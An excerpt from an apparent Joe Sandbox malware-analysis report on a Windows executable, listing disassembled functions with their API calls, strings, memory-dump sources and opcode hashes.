                                                                                                                    • Opcode ID: 0d338f07fa3c844e69953a8d12b3c37371365ab000fc395b8195fa08d9b6da79
                                                                                                                    • Instruction ID: c007922c904df71c383d9f6deb4c87bebb698e2f8a573535cf5bcd58071676e1
                                                                                                                    • Opcode Fuzzy Hash: 0d338f07fa3c844e69953a8d12b3c37371365ab000fc395b8195fa08d9b6da79
                                                                                                                    • Instruction Fuzzy Hash: 53F04431944208BBCB159FA4DC09BAEBFF8EF44715F0041E9F805A3260DFB49E40CA90
                                                                                                                    Function 00B8F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B9081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B90836
                                                                                                                      • Part of subcall function 00B9081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8F2D8,Crypt32.dll,00000000,00B8F35C,?,?,00B8F33E,?,?,?), ref: 00B90858
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B8F2E4
                                                                                                                    • GetProcAddress.KERNEL32(00BC81C8,CryptUnprotectMemory), ref: 00B8F2F4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                    • Opcode ID: 6ffa2ae65003ce6b7ad818df2f44d2a86bf9830461c933c880dc2a65b6ef4c76
                                                                                                                    • Instruction ID: d914c0e322756752b6c40bb89dbf2f3433d91ff2b326b55888ac0d258693a046
                                                                                                                    • Opcode Fuzzy Hash: 6ffa2ae65003ce6b7ad818df2f44d2a86bf9830461c933c880dc2a65b6ef4c76
                                                                                                                    • Instruction Fuzzy Hash: A5E04F709507029FCB21AF389C49B65BAD8AF04B00B2489ADF0DAA3660DAF4D540CB50
                                                                                                                    Function 00BA2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2252061734-0
                                                                                                                    • Opcode ID: 3f55f729dd72872f375007efcb84163f04e53d22067fc0d3472f3cf054acf3ec
                                                                                                                    • Instruction ID: 4b0c72d6e70c487e73482a00477a78f2665f6ba2b5d6035624a9304bdef62064
                                                                                                                    • Opcode Fuzzy Hash: 3f55f729dd72872f375007efcb84163f04e53d22067fc0d3472f3cf054acf3ec
                                                                                                                    • Instruction Fuzzy Hash: 8251F571508212AFDB299F18D885BBA77E4FF56710F2441AEEC42475A2E731ED40D790
                                                                                                                    Function 00BABF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00BABF39
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BABF5C
                                                                                                                      • Part of subcall function 00BA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BACA2C,00000000,?,00BA6CBE,?,00000008,?,00BA91E0,?,?,?), ref: 00BA8E38
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BABF82
                                                                                                                    • _free.LIBCMT ref: 00BABF95
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BABFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 336800556-0
                                                                                                                    • Opcode ID: d28ddbb62a1ac33df54237f4c8dfb7284e977293d81a016dc107187c5426ed34
                                                                                                                    • Instruction ID: 21c1f5a2efc33054a254ff5448631d296ba5824e2f4e0edeec2891e28eecd312
                                                                                                                    • Opcode Fuzzy Hash: d28ddbb62a1ac33df54237f4c8dfb7284e977293d81a016dc107187c5426ed34
                                                                                                                    • Instruction Fuzzy Hash: 7101A7726096157F2321167B5C9DC7F6AEDDEC3FA131802A9F914D3142EF61CD0195B0
                                                                                                                    Function 00BA9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00BC1030,00000200,00BA91AD,00BA617E,?,?,?,?,00B8D984,?,?,?,00000004,00B8D710,?), ref: 00BA986E
                                                                                                                    • _free.LIBCMT ref: 00BA98A3
                                                                                                                    • _free.LIBCMT ref: 00BA98CA
                                                                                                                    • SetLastError.KERNEL32(00000000,00BB3A34,00000050,00BC1030), ref: 00BA98D7
                                                                                                                    • SetLastError.KERNEL32(00000000,00BB3A34,00000050,00BC1030), ref: 00BA98E0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: be4bafdfe748c20f903e7de7d1c649c8392e25db09013c0d2964085b81dc2b15
                                                                                                                    • Instruction ID: 241791a888b3fb23d60f3c77d30ef3ae4e5420ca57792561f53439500db2f473
                                                                                                                    • Opcode Fuzzy Hash: be4bafdfe748c20f903e7de7d1c649c8392e25db09013c0d2964085b81dc2b15
                                                                                                                    • Instruction Fuzzy Hash: FD01F43614C6056BC31237356C99A1B26E9DFD3BF073102B8F515A31A2EF78CC016171
                                                                                                                    Function 00B90EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B911CF: ResetEvent.KERNEL32(?), ref: 00B911E1
                                                                                                                      • Part of subcall function 00B911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B911F5
                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B90F21
                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00B90F3B
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00B90F54
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B90F60
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B90F6C
                                                                                                                      • Part of subcall function 00B90FE4: WaitForSingleObject.KERNEL32(?,000000FF,00B91206,?), ref: 00B90FEA
                                                                                                                      • Part of subcall function 00B90FE4: GetLastError.KERNEL32(?), ref: 00B90FF6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1868215902-0
                                                                                                                    • Opcode ID: 8de556214d8c5d19e560d45a6b8b228db14122d3df03325d3cb4b2a089e646f7
                                                                                                                    • Instruction ID: ed62ce51b1078c168f35c1009fb603aa61a1ba5cf681eedb6b0fdbe516edd25b
                                                                                                                    • Opcode Fuzzy Hash: 8de556214d8c5d19e560d45a6b8b228db14122d3df03325d3cb4b2a089e646f7
                                                                                                                    • Instruction Fuzzy Hash: E7015271504B44EFCB22AB64DC85BC6BBE9FF08B10F400969F16B92160CBB57A44CA50
                                                                                                                    Function 00BAC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BAC817
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BAC829
                                                                                                                    • _free.LIBCMT ref: 00BAC83B
                                                                                                                    • _free.LIBCMT ref: 00BAC84D
                                                                                                                    • _free.LIBCMT ref: 00BAC85F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 5701d3c1c6de54d98ca2c1729551c4bc0d6fe4bdcb20e417f5461543cd00bdc7
                                                                                                                    • Instruction ID: 91f1d51770f1e8e76d55386d28b976082d799de431eee30b16a2cf679396b044
                                                                                                                    • Opcode Fuzzy Hash: 5701d3c1c6de54d98ca2c1729551c4bc0d6fe4bdcb20e417f5461543cd00bdc7
                                                                                                                    • Instruction Fuzzy Hash: 0FF01272508200AB8660DB78E585C6677E9FB02714B5458ADF159D7962CFB4FC80CA64
                                                                                                                    Function 00B91FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00B91FE5
                                                                                                                    • _wcslen.LIBCMT ref: 00B91FF6
                                                                                                                    • _wcslen.LIBCMT ref: 00B92006
                                                                                                                    • _wcslen.LIBCMT ref: 00B92014
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B8B371,?,?,00000000,?,?,?), ref: 00B9202F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3397213944-0
                                                                                                                    • Opcode ID: 37198344aeb4f89477d7c8ab50fcc41954ae125c82d1e4859e2d568c48e8fc26
                                                                                                                    • Instruction ID: f259a50e5f8d99758803d9269f0aa53e99d07278b91cc1f37039214f9b02985f
                                                                                                                    • Opcode Fuzzy Hash: 37198344aeb4f89477d7c8ab50fcc41954ae125c82d1e4859e2d568c48e8fc26
                                                                                                                    • Instruction Fuzzy Hash: F1F09032008014BFCF262F50EC09DCE3FA6EF52B70B118096F61A5B061CB72D661D6E0
                                                                                                                    Function 00BA8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00BA891E
                                                                                                                      • Part of subcall function 00BA8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34), ref: 00BA8DE2
                                                                                                                      • Part of subcall function 00BA8DCC: GetLastError.KERNEL32(00BB3A34,?,00BAC896,00BB3A34,00000000,00BB3A34,00000000,?,00BAC8BD,00BB3A34,00000007,00BB3A34,?,00BACCBA,00BB3A34,00BB3A34), ref: 00BA8DF4
                                                                                                                    • _free.LIBCMT ref: 00BA8930
                                                                                                                    • _free.LIBCMT ref: 00BA8943
                                                                                                                    • _free.LIBCMT ref: 00BA8954
                                                                                                                    • _free.LIBCMT ref: 00BA8965
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 8106b0a146b17c1d46be60743a11349c09cb9841e84fd830d200a39614d5ee4f
                                                                                                                    • Instruction ID: 1e80fccd66c9cf3a88ba1b58f382ed3147a747126e4f21220af4d392c0b1cbf8
                                                                                                                    • Opcode Fuzzy Hash: 8106b0a146b17c1d46be60743a11349c09cb9841e84fd830d200a39614d5ee4f
                                                                                                                    • Instruction Fuzzy Hash: 5CF03AB58141628B8A4A7F24FC824963FE9F726710700069AF5655F6B1DFB1C941AB81
                                                                                                                    Function 00B915FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _swprintf
                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                    • Opcode ID: b1e511d922f510080f18f01acf178b774abc4b968b8d0fce37f024d9ac94f9de
                                                                                                                    • Instruction ID: d39953025272d582280a77d13f8c6c85e80ea4e2e7554afa5af9c91df2814a9d
                                                                                                                    • Opcode Fuzzy Hash: b1e511d922f510080f18f01acf178b774abc4b968b8d0fce37f024d9ac94f9de
                                                                                                                    • Instruction Fuzzy Hash: C3510C75688303F6EE112AEC8DC6F3576E5AB05B04F148DF6F396640F1D9B2A810B71A
                                                                                                                    Function 00BA7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\eP6sjvTqJa.exe,00000104), ref: 00BA7FAE
                                                                                                                    • _free.LIBCMT ref: 00BA8079
                                                                                                                    • _free.LIBCMT ref: 00BA8083
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                    • API String ID: 2506810119-917788599
                                                                                                                    • Opcode ID: 3a9480b17b89135c8ab7cebdb5c8d88b8152d4333a025add9bc919d1765a2ef4
                                                                                                                    • Instruction ID: dfc2b9c43f3fe139f2fa0756b3f77d07e39bfa340c66429a09ddb0d8294ff20e
                                                                                                                    • Opcode Fuzzy Hash: 3a9480b17b89135c8ab7cebdb5c8d88b8152d4333a025add9bc919d1765a2ef4
                                                                                                                    • Instruction Fuzzy Hash: 78319071A08258AFDB21DF99DC8599EBBFCEF96310F1041EAF8049B211DA718E44CB61
                                                                                                                    Function 00BA31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BA31FB
                                                                                                                    • _abort.LIBCMT ref: 00BA3306
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                    • String ID: MOC$RCC
                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                    • Opcode ID: 482a4d5c0a1c7ce08c62a4d033dcb6871734c5c31876444f572635d715e1ec14
                                                                                                                    • Instruction ID: 1de45d60ef1d45d0b5093b0a96134c9e3a5db6e6cdbc0776c4571541d62d0e9c
                                                                                                                    • Opcode Fuzzy Hash: 482a4d5c0a1c7ce08c62a4d033dcb6871734c5c31876444f572635d715e1ec14
                                                                                                                    • Instruction Fuzzy Hash: 24415671904209AFCF15DF98CC81AEEBBF5FF4A704F188099F904A7221D336AA50DB54
                                                                                                                    Function 00B87401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B87406
                                                                                                                      • Part of subcall function 00B83BBA: __EH_prolog.LIBCMT ref: 00B83BBF
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B874CD
                                                                                                                      • Part of subcall function 00B87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87AAB
                                                                                                                      • Part of subcall function 00B87A9C: GetLastError.KERNEL32 ref: 00B87AF1
                                                                                                                      • Part of subcall function 00B87A9C: CloseHandle.KERNEL32(?), ref: 00B87B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                    • Opcode ID: fa7a6bc2219d29c87fa83d14b326e2ff13c1c3e019a849b6f36a62902412c2b4
                                                                                                                    • Instruction ID: 3d5b4d4c5a1809fc3a98a3ce0db954bffbd60b84744cf42df50d3a1fdb2ae156
                                                                                                                    • Opcode Fuzzy Hash: fa7a6bc2219d29c87fa83d14b326e2ff13c1c3e019a849b6f36a62902412c2b4
                                                                                                                    • Instruction Fuzzy Hash: F131B071D44248AADF11FBA8CC45FEE7BE9EB19708F144095F405A72A2CF748A44CB60
                                                                                                                    Function 00B9AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B9AD98
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B9ADAD
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B9ADC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
